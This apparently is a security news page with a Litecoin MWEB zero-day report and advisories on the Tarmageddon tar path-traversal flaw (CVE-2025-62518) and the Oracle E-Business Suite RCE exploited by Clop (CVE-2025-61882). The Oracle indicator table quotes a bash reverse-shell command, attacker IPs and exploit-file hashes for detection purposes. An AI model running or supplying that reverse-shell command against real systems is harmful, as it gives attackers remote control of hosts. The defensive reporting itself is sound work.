Zeroday

Network Security in Litecoin Compromised by ZeroDay Bug

Litcoin network security compromised
A zero-day bug caused a DoS attack that disrupted major mining pools.
Unpatched Litecoin Nodes Created the Vulnerability, allowed an invalid MWEB transaction allowing them to peg out coins to third party DEX’s

A sophisticated zero-day bug triggered a chain of events that included a Denial of Service (DoS) attack on Litcoin a major mining pools and a specialized exploit of the MimbleWimble Extension Blocks (MWEB). The zero-day specifically targeted MWEB, Litecoin’s privacy feature which are complex in nature and that creates attack surfaces. The specific vulnerability has been patched in version 0.21.5.4,

How is Litecoin different from Bitcoin?

Litecoin is a 2011 fork of Bitcoin with faster block times (2.5 minutes vs. 10 minutes), a larger supply cap (84 million vs. 21 million), and the Scrypt mining algorithm instead of SHA-256. The biggest functional difference today is MWEB, which gives Litecoin optional transaction privacy that Bitcoin does not offer at the base layer.

Attack Module

The attack had two components. First, the attackers used a DoS scheme to take mining nodes running the updated code offline. Then, unprotected nodes formed an alternative chain that included invalid MWEB transactions.

What caused the zero day vulnerability?

The bug or flaw led to a denial-of-service assault that temporarily interrupted operations at several prominent mining pools. The event, which occurred over the weekend, exposed a narrow window of risk but was contained efficiently through coordinated technical measures.

At the core of the disruption were mining nodes that had not yet applied the most recent security patches. Litcon said now the bug has now been fully patched, and the network continues to operate normally. A new core version was released subsequently, including important security updates.

The zero-day attack succeeded because many Litecoin nodes ran outdated software that improperly validated MWEB transactions. This created a two-tier network in which different participants operated under distinct consensus rules.

Bitcoin and Litecoin have no mandatory update mechanism so mostly Nodes can run old software indefinitely. Attackers seized this opportunity and the exact vulnerability exploited in the attack.

Litecoin developers have fixed the issue and the zeroday incident exposes how dependent decentralized networks are on coordinated node updates and careful operator behavior. The network was recovered, but it did not emerge unscathed.

Team Litcoin confirmed the bug on their official X account and stated a patch has been fully deployed, with node operators urged to update immediately. No user funds were lost, but the reorg reversed transactions across those 13 blocks, a depth that qualifies as a serious network event by any measure.

Conclusion:

As per security experts the incident exposed a vulnerability in the update mechanism in Proof-of-Work (PoW) networks and there is a level of risk in its privacy layers as threat actors took advantage by channeling funds through external platforms.

At the same time causing a Denial of Service attack (DoS) on large mining pools. The incident proved how important it is for nodes and miners to stay up to date and patch timely.

Sources: Litecoin Network Security: Zero-Day Bug Fixed

Litecoin MWEB Exploit Explained | 13-Block Reorg and What It Means | 2026

Google Chrome Patching 3 High Security Flaws Highlights Browser Security

Google Chrome emergency security update tracked as CVE-2026-2441; Highlights Browser Security

Critical Vulnerability in CISCO Catalyst SD-WAN Authentication Bypass 0-Day; Patch Now

Cisco SD-WAN Authentication Bypass Zero-Day

Microsoft Released Emergency Security Updates; Patches Microsoft Office 0-Day Vulnerability

Microsoft Released Emergency Security Updates

Cyberattack Campaign Targeted CISCO Products; Impacting Cisco AsyncOS Software; Security Updates Released

Cisco Patched Zero-Day RCE Exploited by China-Linked APT in Secure Email Gateways

Microsoft Fixes 113 Vulnerabilities & 1 Actively Exploited 0-Day in First Patch Released -Jan2026

Microsoft Patch Tuesday 2026 Jan

SonicWall Releases Patches in Actively Exploited Privilege Escalation Vulnerability

SonicWall has released a security update to fix a privilege escalation vulnerability in the SonicWall SMA1000 Appliance Management Console (AMC) that was tricked in zero-day attacks to escalate privileges.

Apple iOS & iPadOS Patch 0-Days Vulnerabilities, Exploited in Targeted Attacks

Apple iOS & iPadOS Patch Zero-Days Vulnerabilities, Exploited in Targeted Attacks

TARmageddon Exploitable Tar Extraction Flaw Exposes Systems to Privilege Escalation

Summary A critical vulnerability known as Tarmageddon (CVE-2025-62518) impacts multiple tar extraction utilities and libraries, including GNU tar, libarchive, Python’s tarfile module, and the Rust async-tar library.

Severity	High
CVSS Score	7.8
CVEs	CVE-2025-62518
POC Available	Yes, public PoC and patches available (edera-dev GitHub)
Actively Exploited	Not confirmed widespread exploitation public PoC raises opportunistic risks
Exploited in Wild	No confirmed mass exploitation at time of writing
Advisory Version	1.0

Overview

Tarmageddon (CVE-2025-62518) vulnerability Improper path sanitization and symlink-target validation during extraction enable a crafted tar archive to write files outside the intended extraction directory, leading to arbitrary file overwrite, privilege escalation, or remote code execution when executed by privileged or automated services.

Vulnerability Name	CVE ID	Product Affected	Severity	Fixed Version
Tar path traversal / symlink bypass (async-tar RCE vector)	CVE-2025-62518	GNU tar, libarchive, Python tarfile, Rust async-tar and downstream tools	High	Patches released by maintainers; reference fixes in Edera patch repository and vendor advisories

Technical Summary

Root cause: insufficient canonicalization of file paths and incomplete sanitization of symlink targets within tar archive headers. Behavioral details: Path traversal via ../ sequences and chained symlinks allows crafted archives to escape the extraction root and overwrite system binaries, configuration files, or startup scripts.

A public proof-of-concept confirms this behavior in affected async-tar implementations. Fix: apply upstream and distribution patches that normalize paths and validate symlink targets (edera-dev patches).

Exploitability: public PoC exists for CVE-2025-62518, highest risk when automated extractions run with elevated privileges (CI/CD, build, backup). Manual extraction is lower risk. Impact: Malicious extraction can overwrite critical files, allow service takeover or remote code execution, and lead to full host compromise if run as root.

CVE ID	System Affected	Vulnerability Details	Impact
CVE-2025-62518	Tar libraries and tools async-tar, GNU tar, libarchive, Python tarfile, and any tools that use them.	Crafted tar entries can bypass path checks and write outside the extraction folder (PoC available).	Can overwrite files, allow privilege escalation/RCE if run as root, and contaminate build/CI artifacts.

Remediation:

Apply patches immediately — update tar libraries and utilities with vendor or distribution fixes (Edera patches where applicable).

Disable automatic extraction of untrusted archives in gateways, ingestion services and CI/CD systems.

Use least privilege for extraction processes — avoid root / Administrator contexts.

Replace unsafe extraction calls (e.g., tarfile.extractall()) with secure wrappers that validate path components and reject traversal or symlink abuses.

Sandbox extraction inside containers or VMs with strict filesystem scoping (read-only mounts, AppArmor/SELinux confinement).

Inventory and update all images, containers, and build artifacts that bundle tar utilities or tar libraries.

Detection Guidance: Lab verification: Use the public PoC only in isolated virtual environments to validate that patched version block path traversal and symlink exploits.

SIEM / EDR indicators:

File create/write events to sensitive paths (/etc, /usr/bin, /var, application config dirs) immediately following tar extraction processes.

Creation of symlinks or reparse-points by tar-related processes.

Processes invoking tar or Python extraction libraries writing outside expected extraction directories.

Conclusion:
Tarmageddon (CVE-2025-62518) is a high-risk archive extraction vulnerability that affects widely used tar utilities and libraries, including GNU tar, libarchive, Python’s tarfile, and the Rust async-tar implementation.

This vulnerability should be treated as a Priority-1 patch event for any environment performing automated or privileged tar extractions. Organizations are strongly advised to apply vendor patches immediately, enforce sandboxed extraction workflows, and implement strict least-privilege and path-validation controls to prevent arbitrary file overwrites, privilege escalation, and potential supply-chain compromise.

References:

https://edera.dev/stories/tarmageddon

https://github.com/edera-dev/cve-tarmageddon/tree/main/patches

https://thecyberexpress.com/cve%e2%80%912025%e2%80%9162518-rce-flaw-in-async-tar/

Critical Oracle EBS 0-Day Hit by Clop Ransomware; Oracle Released Emergency Patch

Summary : Security Advisory: Clop Ransomware aimed at extortion of emails targeting customers of Oracle E-Business Suite. The zero-day vulnerability affected Oracle EBusiness Suite (EBS), specifically the Concurrent Processing component used with BI Publisher Integration and is remotely exploitable without authentication. This allows attackers to execute arbitrary code via HTTP.

OEM	Oracle
Severity	Critical
CVSS Score	9.8
CVEs	CVE-2025-61882
POC Available	Yes
Actively Exploited	Yes
Advisory Version	1.0

Overview

Oracle released an emergency patch and Clop ransomware group actively exploited this flaw in real-world data theft campaigns targeting vulnerable versions using by the organizations.

All EBS versions from 12.2.3 to 12.2.14 are affected and immediate patching requires mitigate the vulnerability.

Vulnerability Name	CVE ID	Product Affected	Severity	Affected Version
RCE vulnerability in Oracle E-Business Suite	CVE-2025-61882	Oracle E-Business Suite	Critical	12.2.3 through 12.2.14

Technical Summary

The vulnerability allows attackers to gain remote code execution by sending specially crafted HTTP requests to exposed Oracle EBS services. Once exploited, it enables full system compromise, including reverse shell access. The vulnerability has been using by Clop ransomware group in conjunction with other previously known EBS flaws to exfiltrate sensitive data and extort victims. Indicators of compromise (IoCs) such as malicious IPs, shell commands, and exploit files have been published to help organizations detect past intrusions.

Oracle’s fix includes the patch for this flaw but also mitigates additional exploitation paths identified during their internal investigation.

CVE ID	Component Affected	Vulnerability Details	Impact
CVE-2025-61882	BI Publisher Integration	A critical unauthenticated RCE in Oracle EBusiness Suite affecting the Concurrent Processing/BI Publisher integration.	Full system compromise, data theft.

Recommendations

Users And Administrators should immediately apply the Security Patch for CVE202561882 on all affected Oracle E-Business Suite systems:

Use the patch availability document & search for the patch specific to CVE-2025-61882 for your OS and Oracle EBS version.

Prerequisite: Ensure the October 2023 Critical Patch Update (CPU) is already installed.

Here are some recommendations below

If immediate patching is not possible, restrict HTTP/HTTP/HTTPS access to the EBS application from untrusted networks.

Review server logs, network traffic and system processes to detect signs of exploitation.

Monitor for known Indicators of Compromise (IoCs) provided by Oracle from the table below.

IOCs

Indicator	Type	Description
200[.]107[.]207[.]26	IP	Potential GET and POST activity
185[.]181[.]60[.]11	IP	Potential GET and POST activity
sh -c /bin/bash -i >& /dev/tcp// 0>&1	Command	Establish an outbound TCP connection over a specific port
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d	SHA 256	oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121	SHA 256	oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py
6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b	SHA 256	oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py

Source: Oracle

Conclusion:
This is the ongoing threat exploitation by the ransomware group, particularly for unpatched Oracle EBS deployments.

As this is being actively exploited in the wild, upgrade to the supported patched version and organizations should also review logs, investigate for signs of compromise using Oracle’s IoCs, and strengthen network access controls around EBS systems. Immediate action is required to reduce the risk of further exploitation, data loss and operational disruption.